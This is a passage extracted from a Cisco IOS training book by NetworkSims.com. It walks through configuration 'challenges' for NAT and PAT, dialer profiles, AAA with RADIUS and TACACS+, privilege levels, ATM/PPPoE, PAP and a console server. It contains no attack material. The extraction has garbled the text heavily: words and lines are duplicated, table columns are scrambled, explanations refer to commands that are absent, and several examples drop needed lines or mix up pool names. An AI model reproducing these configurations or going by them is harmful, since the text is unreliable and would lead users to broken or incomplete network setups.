trace back a connection.
- If the NAT device becomes compromised
the external party can redirect traffic.
w1.x1.y1.z1
a1.b1.c1.d1
Backtracking
N
Corporate
WWW
site
NetworkSims.com
Compromised
NAT table
causes the connection
to point to the external
intruders WWW site
External
Intruders
WWW site
117
Figure 5 NAT weaknesses
Programming dynamic NAT

Network address translation allows private IP address to be translated to public address.
This can either be achieved statically, where the translation is fixed by a translation table, or
can be dynamic, where the translation table is set-up as required by the network. Typically,
a global address pool is used from which the public addresses are taken. The command for
this has the format of:
RouterA# config t
RouterA(config)#ip nat pool name start-ip end-ip {netmask netmask | prefix-length
prefix-length}
where the submask length is defined by the optional netmask agument (such as
255.255.255.0), or by a length using prefix-length (or 24 for the 255.255.255.0 subnet mask).
After this, the types of packets which will be translated will be defined. This is achieved
with the access-list command, and has the form:
RouterA# config t
RouterA(config)#access-list access-list-number permit source
A dynamic translation uses the ip
nat inside source list
[source-wildcard]
command, such as:
Router(config)#ip nat inside source list access-list-number pool name
where the access list number is defined. This is then applied to one of the interfaces using
the command (for s0):
RouterA# config t
RouterA (config) # int s0
RouterA(config-if)#ip nat inside
This will translate data packets which are coming into the port. To translate outgoing one,
the ip nat outside command is used.
For example, to define a pool of addresses from 180.10.11.1 to 180.10.11.254:
RouterA(config)#ip nat pool org_pool 180.10.11.1 180.10.11.254 netmask 255.255.255.0
which defines the global addresses as org_pool. This will be used to send translated data
packets out in the Internet. An access-list command is then used to match the translation
addresses:
RouterA(config)#access-list 2 permit 192.168.10.0 0.0.0.255
RouterA(config)#ip nat inside source list 2 pool org_pool
which applies the access-list number 2 to the IP NAT pool of

applied to the interfaces with:
NetworkSims.com
org_pool.
This can then be
118
RouterA(config)#interface e0
RouterA(config-if)#interface s0
RouterA(config-if)#ip nat outside
Thus if a host with an address of 192.168.10.10 sends a data packet out of the network, it will
have one of the addresses from the pool, such as 180.10.11.1. All the hosts outside the
network will use the address from the pool to communicate with the node. By default, these
entries remain in the table for up to 24 hours (in order to allow communications to return).
The time-out can be changed using the command:
RouterA(config)#ip nat translation timeout seconds
This is an important factor, especially when there is a large number of hosts which can only
use a limited pool of addresses. A lower time-out will allow an address to be released, so
that another node can use it.
NAT also enhances security as it limits external users in their connection to local
network, as the translations of addresses will not be permanent (unless a static translation is
implemented). NAT thus hides the topology of the network.
Static translation uses a fixed lookup table to translate the addresses, where each
address which requires an Internet address has a corresponding public IP address. If it is
used on its own, it cannot thus preserve IP address. Thus, typically the two methods are
used, where important nodes, such as servers, will have a static entry, as this guarantees
them an address, while other nodes, which are less important, will be granted a dynamic
translation. This also aids security as the important devices can run enhanced security and
monitoring software, which might not be possible on lower-level devices, which are
typically administered on a daily basis by non-IT personnel.
Static addresses are also useful in translating network topologies from one network
address structure to another, or even when individual nodes are moved from one subnet to
another.
An example of configuring for static addresses of a node of 192.168.10.10 to the
address of 180.10.11.1:
RouterA(config)#ip nat inside source static 192.168.10.10 180.10.11.1
This can this be applied to the inside and outside interfaces with:
RouterA(config)#interface e0
RouterA(config-if)#interface s0
NAT allows organisations to quickly remap their addresses, as conditions require, such as
changing Internet access provider, or to respond to a network breach.
NetworkSims.com
119
One of the advanced features of NAT routers is their ability to use Port Address
Translation (PAT), which allows multiple inside addresses to map to the same global
address. This is sometimes called a many-to-one NAT, or address overloading. With address
overloading, man private addressed nodes can access the Internet using a single global
address. The NAT router keeps track of the different conversations by mapping TCP and
UDP port numbers in the translation table. A translation entry is one which maps one IP
address and port pair to another, and is called an extended table entry. This table will match
internal private IP addresses and ports, to the global address.
The NAT command is used to configure PAT with:
RouterA(config)#ip nat inside source list access-list-number pool name overload
For example, if a network has 20 IP global addresses from 180.10.11.1 to 180.10.11.20, then
the router could be configured with:
RouterA(config)#ip nat pool org_pat_pool 180.10.11.1 180.10.11.20 netmask
255.255.255.0
RouterA(config)#access-list 2 permit 10.1.1.0 0.0.0.255
RouterA(config)#ip nat inside source list 2 pool org_pat_pool overload
RouterA(config)#interface e 0
RouterA(config-if)#interface s 0
This creates an access-list with a label of 2, which is applied using the overload method, to
provide PAT. This method is obviously important in a home network, where users are
granted an IP address for their router. The home network can then be setup with private
addresses.

Outline
This challenge involves the configuration of NAT overload.
Objectives
Define an overloaded NAT.

NetworkSims.com
120
Example
> en
# config t
(config)# ip nat pool mynatpool 150.122.41.99 150.122.41.150 netmask
255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool overload
(config)# int e0
(config-if)# int s0
Explanation
NAT overload is used when more addresses are required than are in the pool. In this case:
identifies the traffic that will be translated for NAT, while:

255.255.255.0
defines the pool of addresses what will be used. As NAT overload is used there can be
many more addresses which can be mapped to this pool. Finally NAT overload is defined
with:
(config)# ip nat inside source list 7 pool mynatpool overload
With NAT overload, the device overloads the first address. Once it reaches it limit of
overloading the device moves onto the second address, and so on.

Outline
This challenge involves the configuration of NAT overload without an address pool.
Objectives
Define an overloaded NAT, and define the port for the external address.
NetworkSims.com
121

Example
> en
# config t
(config)# ip nat inside source list 8 interface s0 ?
overload Overload an address translation
<cr>
(config)# ip nat inside source list 8 interface s0 overload
(config)# int e0
(config-if)# int s0
Explanation
NAT overload without a pool is used where there is only a single address to be used, which
is borrowed from the external interface. In this case:
Finally NAT overload is defined with:

(config)# ip nat inside source list 8 interface s0 overload
where the address on the S0 interface is used as the external address. Thus all of the internal
addresses will be translated to the single external address when it passes from inside the
network to the outside. This is often the case of a home network, which typically has only a
single address for the network connection.

Outline
This challenge involves the configuration of TCP load distribution for NAT.
Objectives
Define an TCP load distribution.

NetworkSims.com
122
Example
> en
# config t
(config)# ip nat pool globalnat 208.132.69.7 208.132.69.57
255.255.192.0 ?
type Specify the pool type
<cr>
255.255.192.0 type ?
match-host Keep host numbers the same after translation
rotary
Rotary address pool
255.255.192.0 type rotary
(config)# ip nat inside destination list 7 pool mynatpool
(config)# int e0
(config-if)# int s0
netmask
netmask
netmask
Explanation
TCP Load Distribution is used where there is a pool of servers, and the NAT translation
assigns the mapping to one of these, in order to even the load. The command:
(config)# ip nat pool
255.255.192.0 type rotary
globalnat
208.132.69.7
208.132.69.57
netmask
defines that the addresses should be assigned to the pool. For example the translations
would be:
1st:
2nd:
3rd:
Inside Local
208.132.69.7 <208.132.69.8 <208.132.69.9 <-
Inside Global
195.11.220.2
195.11.220.2
195.11.220.2
and so on. Thus when the first connection comes in for the address of 195.11.220.2, it will be
translated to 208.132.69.7, the second for 208.132.69.8. Thus each of the servers will have a
more equal loading. The following command defines a dynamic destination translation
(where normally NAT would translate from a source node in the inside network):
(config)# ip nat inside destination list 7 pool mynatpool

NetworkSims.com
123
Outline
This challenge involves the configuration of NAT for overlapping networks.
Objectives
Define an overloaded NAT.

Example
> en
# config t
255.255.255.0
(config)# ip nat pool yournatpool 140.12.41.99 140.22.41.150 netmask
255.255.255.0
(config)# ip nat inside source list 7 pool mynatpool
(config)# ip nat outside source list 7 pool yournatpool
(config)# int e0
(config-if)# int s0

Outline
This challenge involves the configuration of a dialer profile.
Objectives
Define the interface for Dialer0.

Define encapsulation and authentication.
Define dialer details.
NetworkSims.com
124
Example
> en
# config t
(config)# int dialer0
(config-if)# description test link
(config-if)# dialer remote-name temp
(config-if)# dialer idle-timeout 100
(config-if)# dialer string 2221111
(config-if)# dialer pool 1
(config-if)# int bri0
(config-if)# dialer pool-member 1

Outline
This challenge involves the configuration of a dialer profile with a map-class.
Objectives
Define a dialer map-class.

Define the interface for Dialer0.
Define encapsulation and authentication.
Define dialer details.
Example
> en
# config t
(config)# map-class
(config-map-class)#
(config-map-class)#
(config-map-class)#
NetworkSims.com
dialer kirkcaldy
dialer fast-idle 15
dialer idle-timeout 60
exit
125

(config-if)# dialer string 2221111 class kirkcaldy
Explaination
In the previous example (Challenge 75), the following was used:
In order to allow reuse a class-map can be created for the characteristics of the dialup string,
such as:
(config)# map-class
(config-map-class)#
(config-map-class)#
(config-map-class)#
dialer kirkcaldy
dialer fast-idle 15
dialer idle-timeout 60
exit
and can be applied onto the dialer string with:

(config-if)# dialer string 2221111 class kirkcaldy

Outline
This challenge involves the configuration of a local server for AAA.
NetworkSims.com
126
Objectives
Define AAA.
Define the local server.
Example
> enable
# config t
(config)# aaa authentication login default local
(config)# username fred password bert
(config)# username fred1 password bert2

Outline
This challenge involves the configuration of a RADIUS server for AAA.
Objectives
Define AAA.
Define the radius server.
Example
> enable
# config t
(config)# radius-server ?
attribute
Customize selected radius attributes
authorization
Authorization processing information
challenge-noecho
Data echoing to screen is disabled during
Access-Challenge
configure-nas
Attempt to upload static routes and IP pools at startup
deadtime
Time to stop using a server that doesn't respond
directed-request
Allow user to specify radius server to use with `@server'
domain-stripping
Strip the domain from the username
host
Specify a RADIUS server
key
encryption key shared with the radius servers
local
Configure local RADIUS server
optional-passwords The first RADIUS request can be made without requesting a
password
NetworkSims.com
127
retransmit
Specify the number of retries to active server
timeout
Time to wait for a RADIUS server to reply
unique-ident
Higher order bits of Acct-Session-Id
vsa
Vendor specific attribute configuration
(config)# radius-server host 39.100.234.1
(config)# radius-server key ?
LINE Text of shared key
(config)# radius-server key krinkle
(config)# aaa ?
accounting
Accounting configurations parameters.
authentication Authentication configurations parameters.
authorization
Authorization configurations parameters.
configuration
Authorization configuration parameters.
nas
NAS specific configuration
new-model
Enable NEW access control commands and functions.(Disables
OLD commands.)
processes
Configure AAA background processes
(config)# aaa authentication ?
arap
Set authentication lists for arap.
banner
Message to use when starting login/authentication.
enable
Set authentication list for enable.
fail-message
Message to use for failed login/authentication.
login
Set authentication lists for logins.
nasi
Set authentication lists for NASI.
password-prompt Text to use when prompting for a password
ppp
Set authentication lists for ppp.
username-prompt Text to use when prompting for a username
(config)# aaa authentication login ?
WORD
Named authentication list.
default The default authentication list.
(config)# aaa authentication login default ?
enable
Use enable password for authentication.
group
Use Server-group
line
Use line password for authentication.
local
Use local username authentication.
local-case Use case-sensitive local username authentication.
none
NO authentication.
(config)# aaa authentication login default group radius
arap
banner
enable
fail-message
login
nasi
ppp
(config)# aaa authentication ppp ?
WORD
(config)# aaa authentication ppp default radius
(config)# aaa authorization ?
commands
For exec (shell) commands.
config-commands For configuration mode commands.
exec
For starting an exec (shell).
network
For network services. (PPP, SLIP, ARAP)
NetworkSims.com
128
reverse-access
For reverse access connections
(config)# aaa authorization network ?
WORD
Named authorization list.
default The default authorization list.
(config)# aaa authorization network default ?
enable
group
Use Server-group
line
local
(config)# aaa authorization network default group radius
(config)# aaa authorization exec default group radius

Outline
This challenge involves the configuration of a Tacacs+ server for AAA.
Objectives
Define AAA.
Define the Tacacs+ server.
Example
> enable
# config t
(config)# tacacs-server host 39.100.234.1
(config)# tacacs-server key krinkle
(config)# aaa authentication login default group tacacs
(config)# aaa authentication ppp default group tacacs
(config)# aaa authorization network default group tacacs
(config)# aaa authorization exec default group tacacs

Outline
This challenge involves the configuration of a Tacacs+ server for commands.
Objectives
NetworkSims.com
129
Define AAA.
Define privileges.
Define command authorization for a Tacacs+ server.
Example
> enable
# config t
(config)# privilege configure level 7 snmp-server host
(config)# privilege configure level 7 snmp-server enable
(config)# privilege configure level 7 snmp-server
(config)# privilege exec level 7 ping
(config)# privilege exec level 7 configure terminal
(config)# privilege exec level 7 configure
(config)# aaa authorization commands 0 default group tacacs+
Explanation
The privilege levels go from level 0 to level 15, such as:
Level 0. This only includes five commands: disable, enable, exit, help and logout.
Level 1. This is the non-priviledged mode with a prompt of router>.
Level 15. This is the highest level of privilege, and has a prompt of router#.
Typical 1 commands are:

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
NetworkSims.com
Create a temporary Access-List entry

Reset functions
Open a terminal connection
Turn off privileged commands
Disconnect an existing network connection
Turn on privileged commands
Exit from the EXEC
Lock the terminal
Log in as a particular user
Exit from the EXEC
Name an existing network connection
Send echo messages
Run command on remote switch
Resume an active network connection
Show running system information
Display information about terminal lines
Open a telnet connection
Set terminal line parameters
Trace route to destination
130
tunnel
where
Open a tunnel connection

List active connections
Thus:
(config)#
(config)#
(config)#
(config)#
(config)#
(config)#
privilege
privilege
privilege
privilege
privilege
privilege
configure level 7 snmp-server host

configure level 7 snmp-server enable
configure level 7 snmp-server
exec level 7 ping
exec level 7 configure terminal
exec level 7 configure
moves these commands to Level 7. For example ping is a Level 1 command and is now a
Level 7, while the rest have moved from Level 15 to Level 7.

Outline
This challenge involves the configuration of security of a router.
Objectives
Define usernames and passwords.

Define privilege levels.
Restrict access of users to a single host.
Example
> enable
# config t
(config)# username fred
(config)# username test
password bert
nopassword
privilege 15
privilege 1
user-maxlinks 2
permit host 192.168.0.1
access-class 9
Explanation
NetworkSims.com
131

access-enable
clear
connect
disable
disconnect
enable
exit
help
lock
login
logout
name-connection
ping
rcommand
resume
show
systat
telnet
terminal
traceroute
tunnel
where

Reset functions
Exit from the EXEC
Lock the terminal
Exit from the EXEC
Send echo messages
Thus:
(config)# username fred privilege 15
(config)# username test privilege 1
sets the maximum privilege level for fred at 15, while test will only be able to enter the nonprivileged mode. Also:
(config)# username fred access-class 9
restricts the access for fred to a single host (192.168.0.1), so that the user will not be able to
log-in from any other host. The following:
(config)# username test user-maxlinks 2
restricts the number of connections for test to two.

Outline
NetworkSims.com
132
Objectives
Define Tacacs+.
Define accounting for start and stop events.
Example
> enable
# config t
(config)# aaa account network default start-stop group tacacs+
(config)# aaa account reverse-access default group tacacs+

Outline
This challenge involves the configuration of ATM.
Objectives
Define E0.
Define ATM.
Define bridge protocol.
Example
> enable
# config t
(config)# int e0
(config-if)# bridge-group 1
(config-if)# exit
(config)# int atm0
(config-if)# mac-address 1111.2222.3333
(config-if)# dsl operating-mode auto
(config-if)# pvc 8/35
(config-if-atm-vc)# encapsulation aal5snap
(config-if-atm-vc)# exit
(config-if)# exit
NetworkSims.com
133
(config)# bridge 1 protocol ieee
Explanation
In this case a bridge is created between the E0 and the ATM0 port. The encapsulation is
aal5snap (AAL5 Link Control/Subnet Access Protcol) which supports multiple protocols
over the same PVC.

Outline
This challenge involves the configuration of ATM with a dialer interface and to encapsulate
PPP within an Ethernet environment.
Objectives
Define a dialer
Define ATM.
Example
> enable
# config t
(config)# int atm0
(config-atm-vc)# pppoe-client dial-pool-number 1
(config-atm-vc)# exit
(config-if)# exit
(config-if)# ip address negotiated
(config-if)# ip mtu 1492
(config-if)# ppp chap hostname newyork
(config-if)# ppp chap password default1
Explanation
PPPoE encapsulates PPP within an Ethernet frame.
NetworkSims.com
134

Outline
This challenge involves the configuration of PPPoA with NAT
Objectives
Define a dialer.
Define ATM.
Example
> enable
# config t
(config)# int e0
(config-if)# exit
(config)# int atm0
(config-atm-vc)# encapsulation aal5mux ppp dialer
(config-atm-vc)# dialer pool member 1
(config-if)# exit
(config-if)# exit
(config)# ip nat inside source list 10 interface dialer0 overload
(config)# ip route 0.0.0.0 0.0.0.0 dialer0
Explanation
PPPoA encapsulates PPP within ATM cells.
NetworkSims.com
135

Outline
This challenge involves the configuration of ATM for VPDN.
Objectives
Define a dialer
Define ATM.
Example
> enable
# config t
(config)# vpdn enable
(config)# vpdn-group test
(config-vpdn)# request-dialin
(config-vpdn-req-in)# protocol pppoe
(config-vpdn-req-in)# exit
(config-vpdn)# exit
(config)# int e0
(config-if)# exit
(config)# int atm0
(config-atm-vc)# pppoe-client dial-pool-number 1
(config-if)# exit

NetworkSims.com
136
Outline
This challenge involves the configuration of interactive PPP sessions.
Objectives
Define async parameters.

Define line parameters.
Example
> enable
# config t
(config-if)# async ?
default Specify default parameters
dynamic Specify parameters which user may change
mode
Specify line mode (interactive or dedicated interface use)
(config-if)# async mode ?
dedicated
Line is dedicated as an async interface
interactive Line may be switched between interactive use and async interface
(config-if)# async mode interactive
(config-if)# exit
(config)# line 1
arap
ppp
slip
timeout
<cr>
(config-line)# autoselect during-login

Outline
This challenge involves the configuration of interface addressing method for local devices.
NetworkSims.com
137
Objectives

Define loopback parameters.
Example
> enable
# config t
(config)# int loopback1
(config-if)# exit
(config-if)# ip unnumbered loopback1

Outline
This challenge involves the configuration of a specific address for the dial-in host.
Objectives

Define the peer address.
Example
> enable
# config t
(config-if)# peer default ip address 192.168.1.1
Explanation
NetworkSims.com
138
In this example the access-server uses the Async 6 port for an asynchronous connection.
Once it has connected it assigns the connected host with the IP address of 192.168.1.1 (Figure
1).
Async 6
PSTN
>> enable
enable
## config
config tt
(config)#
(config)# int
int async
async 66
(config-if)#
(config-if)# peer
peer default
default ip
ip address
address 192.168.1.1
192.168.1.1
Host is assigned the

address of 192.168.1.1
Figure 1: Host assigned a fixed IP address

Outline
This challenge involves the configuration of the allocation of the address for the dial-in host
using a local pool.
Objectives

Define local pool of address for remote host.
Example
> enable
# config t
(config-if)# peer default ip address pool testing
(config)# ip local pool testing 10.0.0.1 10.0.0.10
Explanation
NetworkSims.com
139
Once it has connected it assigns the connected host with an IP address from the pool of
addresses from 10.0.0.1 to 10.0.0.10 (see Figure 1).
Async 6
PSTN
(config)#
(config)# int
int async
async 66
(config-if)#
(config-if)# peer
peer default
default ip
ip address
address pool
pool testing
testing
(config)#
(config)# ip
ip local
local pool
pool testing
testing 10.0.0.1
10.0.0.1 10.0.0.10
10.0.0.10

Pool of 10.0.0.1 to
10.0.0.10
Figure 1: Host assigned an address from the local pool

Outline
This challenge involves the configuration of DHCP allocation address for the dial-in host
using a DHCP pool.
Objectives

Define a DHCP pool.
Example
> enable
# config t
(config-if)# peer default ip address dhcp-pool wyoming
(config-dhcp)# exit
(config)# ip dhcp ?
NetworkSims.com
140
conflict
database
excluded-address
ping
pool
relay
smart-relay
Explanation
Once it has connected it assigns the connected host with the IP address of taking from the
dhcp pool (Figure 1).
Async 6
PSTN
address from the DHCP pool
(config)#
(config)# int
int async
async 66
(config-if)#
(config-if)# peer
peer default
default ip
ip address
address dhcp-pool
dhcp-pool wyoming
wyoming
(config)#
(config)# ip
ip dhcpd
dhcpd pool
pool wyoming
wyoming
(config-dhcp)#
(config-dhcp)# network
network 249.189.108.0
249.189.108.0 255.255.255.0
255.255.255.0
(config-dhcp)#
(config-dhcp)# dns-server
dns-server 249.189.108.58
249.189.108.58
(config-dhcp)#
(config-dhcp)# netbios-name-server
netbios-name-server 249.189.108.61
249.189.108.61
(config-dhcp)#
(config-dhcp)# lease
lease 33
(config-dhcp)#
default-router
249.189.108.87
(config-dhcp)#
(config-dhcp)# exit
exit
(config)#ip
(config)#ip dhcp
dhcp excluded-address
excluded-address 249.189.108.26
249.189.108.26
(config)#
(config)# ip
ip dhcp
dhcp ping
ping timeout
timeout 350
350
Figure 1: Host assigned an address from the DHCP server pool

Outline
This challenge involves the configuration for PAP.
Objectives
NetworkSims.com
141
Define local address.

Define PAP details.
Example
> enable
# config t
(config)# hostname edinburgh
(config)# username newyork password test
(config-if)# dialer map ip 192.168.1.2 name newyork
(config-if)# ppp pap sent-username edinburgh password ttt
Explanation
In this example the username is set as the hostname of the remote device. Figure 1 shows an
example configuration for two devices, on which either can connect to the other.
Async 6
PSTN
>> enable
enable
## config
config tt
(config)#
(config)# hostname
hostname edinburgh
edinburgh
(config)#
(config)# username
username newyork
newyork password
password test
test
(config)#
int
async
(config-if)#
encapsulation
ppp
(config-if)#
(config-if)# ppp
ppp authentication
authentication pap
pap
(config-if)#
(config-if)# ip
ip address
address 192.168.1.1
192.168.1.1 255.255.255.0
255.255.255.0
(config-if)#
(config-if)# dialer
dialer map
map ip
ip 192.168.1.2
192.168.1.2 name
name newyork
newyork
(config-if)#
ppp
pap
sent-username
edinburgh
(config-if)# ppp pap sent-username edinburgh password
password ttt
ttt
>> enable
enable
## config
config tt
(config)#
(config)# hostname
hostname newyork
newyork
(config)#
(config)# username
username edinburgh
edinburgh password
password ttt
ttt
(config)#
(config)# int
int async
async 66
(config-if)#
encapsulation
ppp
(config-if)#
(config-if)# ppp
ppp authentication
authentication pap
pap
(config-if)#
(config-if)# ip
ip address
address 192.168.1.2
192.168.1.2 255.255.255.0
255.255.255.0
(config-if)#
(config-if)# dialer
dialer map
map ip
ip 192.168.1.1
192.168.1.1 name
name edinburgh
edinburgh
(config-if)#
ppp
pap
sent-username
newyork
(config-if)# ppp pap sent-username newyork password
password test
test

Outline
This challenge involves the configuration of a 2501 Console Server, which has multiple TTY
connections which connect to the console ports of devices. This allows for remote
connections. For example the first TTY connection can be connected to by:
telnet IP 2001
the second by:
NetworkSims.com
142
telnet IP 2002
Objectives

Show connections.
Example
> enable
# config t
(config-if)# exit
(config)# int e0
(config-if)# exit
(config)# line 1 16
(config-line)# tran input ?
all
All protocols
none
No protocols
pad
X.3 PAD
v120
Async over ISDN
(config-line)# transport input all
(config-line)# no ?
absolute-timeout
Set absolute timeout for line disconnection
access-class
Filter connections based on an IP access list
activation-character
Define the activation character
autobaud
Set line to normal autobaud
autocommand
Automatically execute an EXEC command
autocommand-options
Autocommand options
autohangup
Automatically hangup when last connection closes
autoselect
Set line to autoselect
buffer-length
Set DMA buffer length
data-character-bits
Size of characters being handled
databits
Set number of data bits per character
disconnect-character
Define the disconnect character
dispatch-character
Define the dispatch character
dispatch-machine
Reference a TCP dispatch state machine
dispatch-timeout
Set the dispatch timer
domain-lookup
Enable domain lookups in show commands
editing
Enable command line editing
escape-character
Change the current line's escape character
exec
Configure EXEC
exec-banner
Enable the display of the EXEC banner
exec-character-bits
Size of characters to the command exec
exec-timeout
Set the EXEC timeout
flowcontrol
Set the flow control
flush-at-activation
Clear input stream at activation
full-help
Provide help to unprivileged user
history
Enable and control the command history function
NetworkSims.com
143
hold-character
insecure
international
ip
length
location
lockable
logging
login
logout-warning
modem
monitor
motd-banner
notify
ntp
padding
parity
password
private
privilege
refuse-message
rotary
rxspeed
script
session-disconnect-warning
session-limit
session-timeout
special-character-bits
speed
start-character
stop-character
stopbits
telnet
terminal-type
timeout
transport
txspeed
vacant-message
width
x25
(config-line)# no exec
(config-line)# exit
(config)# exit
Define the hold character

Mark line as 'insecure' for LAT
Enable international 8-bit character support
IP options
Set number of lines on a screen
Enter terminal location description
Allow users to lock a line
Modify message logging facilities
Enable password checking
Set Warning countdown for absolute timeout of
line
Configure the Modem Control Lines
Copy debug output to the current terminal line
Enable the display of the MOTD banner
Inform users of output from concurrent sessions
Configure NTP
Set padding for a specified output character
Set terminal parity
Set a password
Configuration options that user can set will
remain in effect between terminal sessions
Change privilege level for line
Define a refuse banner
Add line to a rotary group
Set the receive speed
specify event related chat scripts to run on the
line
Set warning countdown for session-timeout
Set maximum number of sessions
Set interval for closing connection when there is
no input traffic
Size of the escape (and other special) characters
Set the transmit and receive speeds
Define the start character
Define the stop character
Set async line stop bits
Telnet protocol-specific configuration
Set the terminal type
Timeouts for the line
Define transport protocols for line
Set the transmit speeds
Define a vacant banner
Set width of the display terminal
X25 protocol-specific configuration
# sh version
Cisco Internetwork Operating System Software
IOS (tm) 2500 Software (C2500-I-L), Version 12.0(2a), RELEASE SOFTWARE (fc1)
Copyright (c) 1986-1999 by cisco Systems, Inc.
Compiled Fri 01-Jan-99 14:38 by phanguye
Image text-base: 0x0302E1C0, data-base: 0x00001000
ROM: System Bootstrap, Version 11.0(10c)XB1, PLATFORM SPECIFIC RELEASE SOFTWARE (fc1)
BOOTFLASH: 3000 Bootstrap Software (IGS-BOOT-R), Version 11.0(10c)XB1, PLATFORM SPECIFIC
RELEASE SOFTWARE (fc1)
cons uptime is 32 minutes
System restarted by power-on
System image file is "flash:c2500-i-l.120-2a"
NetworkSims.com
144
cisco AS2511-RJ (68030) processor (revision I) with 6144K/2048K bytes of memory.

Processor board ID 12933183, with hardware revision 00000000
Bridging software.
X.25 software, Version 3.0.0.
1 Ethernet/IEEE 802.3 interface(s)
1 Serial network interface(s)
16 terminal line(s)
32K bytes of non-volatile configuration memory.
8192K bytes of processor board System flash (Read ONLY)
Configuration register is 0x2102
# show running
Using 1157 out of 32762 bytes
!
version 12.0
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname cons
!
enable secret 5 $1$JoVG$/lz4ezMej5nRUUsTCFmvv1
enable password 7 110A15040401
!
ip subnet-zero
no ip routing
no ip domain-lookup
!
interface Loopback0
ip address 10.0.0.1 255.255.255.255
no ip directed-broadcast
!
interface Ethernet0
ip address 192.168.1.100 255.255.255.0
no ip route-cache
no ip mroute-cache
!
interface Serial0
no ip address
no ip route-cache
no ip mroute-cache
shutdown
!
ip default-gateway 192.168.1.254
ip classless
!
!
line con 0
password 7 14141C0A1C55
login
transport input none
line 1 16
no exec
exec-timeout 0 0
password 7 030752180500
login
transport input all
transport output telnet
line aux 0
line vty 0 4
NetworkSims.com
145
password 7 045805071F70
login
!
end
# sh
Tty
0
1
2
* 3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
* 18
19
20
21
22
line
Typ
CTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
TTY
AUX
VTY
VTY
VTY
VTY
VTY
Tx/Rx
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
9600/9600
A Modem
-
Roty AccO AccI

-
Uses
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
Noise
0
22
62
20
0
0
0
0
2
0
2
0
0
0
0
0
0
0
0
0
0
0
0
Overruns
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
Int
-
Noise
0
22
62
20
0
0
0
0
2
0
2
0
0
0
0
0
0
0
0
0
0
0
0
Overruns
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
0/0
Int
-
In this case there is a connection on TTY 3 and TTY 18.

# clear line 3
# sh line
Tty Typ
Tx/Rx
0 CTY
1 TTY
9600/9600
2 TTY
9600/9600
3 TTY
9600/9600
4 TTY
9600/9600
5 TTY
9600/9600
6 TTY
9600/9600
7 TTY
9600/9600
8 TTY
9600/9600
9 TTY
9600/9600
10 TTY
9600/9600
11 TTY
9600/9600
12 TTY
9600/9600
13 TTY
9600/9600
14 TTY
9600/9600
15 TTY
9600/9600
16 TTY
9600/9600
17 AUX
9600/9600
* 18 VTY
19 VTY
20 VTY
21 VTY
22 VTY
NetworkSims.com
A Modem
-
Roty AccO AccI

-
Uses
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
0
1
0
0
0
0
146
CCNP BCMSN Part 1

Outline
This challenge involves the configuration an IP address on a VLAN
Objectives
Setup the VLAN address.

Define a domain-name.
Example
> en
# config t
(config-if)# ip address ?
A.B.C.D IP address
(config-if)# ip address 148.183.229.5 ?
A.B.C.D IP subnet mask
(config-if)# exit
(config)# ip domain-name ?
(config)# ip default-gateway ?
A.B.C.D IP address of default gateway

Outline
This challenge involves the configuration of the console password and to enable the HTTP
server.
Objectives
NetworkSims.com
147
Setup the console password.

Define the HTTP port.
Example
> en
# config t
(config)#lin con ?
(config-line)# password ?
0
7
LINE The UNENCRYPTED (cleartext) line password
(config-line)# password texas
(config-line)# exit
(config)# ip http ?
access-class
authentication Set http authentication method
path
port
HTTP port
server
Enable HTTP server
(config)# ip http port ?
<0-65535> HTTP port
(config)# cdp ?
holdtime
timer
run
(config)# cdp run
(in sec)

Outline
This challenge involves the configuration of the VTY server and SNMP settings
Objectives
Setup a password on the Telnet session.

NetworkSims.com
148
Example
# config t
(config)#line vty ?
(config)#line vty 0 ?
<1-15> Last Line number
<cr>
(config-line)# password manchester
(config-line)# exit
(config)# username june ?
access-class
autocommand
callback-line
callback-rotary
dnis
nocallback-verify
noescape
nohangup
nopassword
password
privilege
secret
user-maxlinks
<cr>
(config)# username june password ?
0
7
LINE The UNENCRYPTED (cleartext) user password
(config)# username june password default1
chassis-id
community
contact
enable
engineID
group
host
ifindex
inform
location
manager
packetsize
queue-length
system-shutdown
trap
SNMP trap options
trap-source
trap-timeout
user
view
(config)# snmp-server community ?
WORD SNMP community string
(config)# snmp-server contact ?
LINE identification of the contact person for this managed node
NetworkSims.com
149

(config)# snmp-server location ?
LINE The physical location of this node
traps
Enable SNMP Traps
(config)#snmp-s enable traps ?
bridge
Enable SNMP STP Bridge MIB traps
c2900
Enable SNMP c2900 traps
cluster
Enable Cluster traps
config
Enable SNMP config traps
entity
Enable SNMP entity traps
envmon
Enable SNMP environmental monitor traps
flash
Enable SNMP FLASH notifications
hsrp
Enable SNMP HSRP traps
mac-notification Enable SNMP MAC Notification traps
port-security
Enable SNMP port security traps
rtr
Enable SNMP Response Time Reporter traps
snmp
Enable SNMP traps
syslog
Enable SNMP syslog traps
vlan-membership
Enable SNMP VLAN membership traps
vlancreate
Enable SNMP VLAN created traps
vlandelete
Enable SNMP VLAN deleted traps
vtp
Enable SNMP VTP traps
<cr>
(config)# snmp-server chassis-id ?
LINE Unique ID string

Outline
This challenge involves the configuration of a hosts table
Objectives

Enable an IP hosts table.
Example
# config t
End with CNTL/Z.
(config)# ip host ?
WORD Name of host
(config)# ip host brechin ?
NetworkSims.com
150
<0-65535>
A.B.C.D
Host IP address
(config)# ip host brechin 209.250.181.10
(config)# ip host mississippi 208.194.196.5
(config)# ip host westvirginia 205.27.128.4
(config)# exit
# show hosts

Outline
This challenge involves the configuration of ethernet port settings and CDP.
Objectives
Setup a description on FA0/1.

Setup a speed on FA0/1.
Setup duplex on FA0/1.
Define CDP details.
Example
# config t
(config)# int fa0/1
(config-if)# description ?
LINE Up to 240 characters describing this interface
(config-if)# speed ?
10
100
auto Enable AUTO speed configuration
